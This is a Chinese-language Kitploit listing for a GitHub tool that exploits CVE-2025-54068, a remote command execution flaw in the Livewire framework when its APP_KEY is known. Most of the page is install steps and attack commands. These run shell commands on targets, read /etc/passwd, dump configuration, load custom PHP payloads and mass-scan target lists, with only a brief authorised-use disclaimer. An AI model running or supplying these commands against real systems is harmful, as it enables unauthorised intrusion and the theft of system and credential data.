Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-54068 — 一个旨在利用CVE-2025-54068和Livewire项目远程命令执行的工具。 | Kitploit
工具/GitHubGitHub/haxorstars/cve-2025-54068
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubhaxorstars/cve-2025-54068

CVE-2025-54068

一个旨在利用CVE-2025-54068和Livewire项目远程命令执行的工具。

查看仓库
51386个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2025-54068

一个设计用于利用 CVE-2025-54068 并在已知 Livewire 项目的 APP_KEY 时实现远程命令执行的工具。

此工具是 Synacktiv 原始项目的重新编码版本:

  • Livepyre — https://github.com/synacktiv/Livepyre

核心概念和方法基于原始实现。 此版本包含微小增强和附加功能,以提高可用性和灵活性。


安装

使用 pipx 安装该工具:

pipx install git+https://github.com/haxorstars/CVE-2025-54068

或使用 uv:

uv tool install git+https://github.com/haxorstars/CVE-2025-54068

🚀 基本用法

针对单个目标运行工具:

livewire-rce-2025 -u target.com

使用自定义参数:

livewire-rce-2025 -u https://target.com -p "id;uname -a;pwd;ls -la"

🛠️ 自定义功能

执行预定义的自定义功能:

livewire-rce-2025 -u target.com --custom-function "shell:ls -la"
livewire-rce-2025 -u target.com --custom-function "read:/etc/passwd"
livewire-rce-2025 -u target.com --custom-function "phpinfo"
livewire-rce-2025 -u target.com --custom-function "config"

在一条命令中组合多个功能:

livewire-rce-2025 -u target.com --custom-function "shell:whoami && shell:id && read:/etc/passwd"

🧩 自定义 PHP 文件

使用您自己的 PHP 负载文件:

livewire-rce-2025 -u target.com --custom-file custom.php --param "shell:id"

🧪 仅生成负载

在不向目标发送的情况下生成负载:

livewire-rce-2025 -generate-payload --custom-function "shell:ls -la"

或使用自定义 PHP 文件:

livewire-rce-2025 -generate-payload --custom-file custom.php

📦 批量检测

从文件中扫描多个目标:

livewire-rce-2025 -mass-check targets.txt -o results.json

使用自定义线程数:

livewire-rce-2025 -mass-check targets.txt -t 20 -o results.json

⚠️ 免责声明

此工具仅用于教育和授权的安全测试目的。请勿将其用于您不拥有或未经明确许可的系统。


祝您黑客愉快😄

下载工具